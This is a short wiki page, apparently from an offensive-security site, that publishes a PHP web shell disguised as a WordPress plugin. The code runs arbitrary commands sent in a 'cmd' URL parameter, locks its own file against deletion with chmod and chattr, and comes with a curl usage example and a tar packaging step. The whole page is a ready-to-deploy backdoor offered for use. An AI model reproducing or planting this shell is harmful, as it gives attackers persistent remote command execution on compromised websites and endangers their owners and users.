WordPress Plugin - shell.php (variant 1)

Revision as of 10:37, 15 May 2018 by Dmina (talk | contribs)

The following file can be used as WordPress plugin or geneneric system call interface. Commands should be url-encoded, passed via 'cmd' param.

E.g. 

curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh"

Enough with intros so here's the code. 

<?php
/**
 * @package My_Shell
 * @version 1.0
 */
/*
Plugin Name: Shell
Plugin URL: http://google.com
Description: A quick shell plugin
Author: BlakSec
Version: 1.0
 */

# prevent file deletion
$myfile = __FILE__;
system("chmod ugo-w $myfile");
system("chattr +i $myfile");
$command=urldecode($_GET["cmd"]);

if (class_exists('ReflectionFunction')) {
	$function = new ReflectionFunction('system');
	$function->invoke($command);
} elseif (function_exists('call_user_func_array')) {
	call_user_func_array('system', array($command));
} elseif (function_exists('call_user_func')) {
	call_user_func('system', $command);
} else {
	system($command);
}
?>

Now just tar it up and it's ready to go 

tar -zcvf ./shell.tgz shell.php
Retrieved from "https://blaksec.com/index.php?title=WordPress_Plugin_-_shell.php_(variant_1)&oldid=293"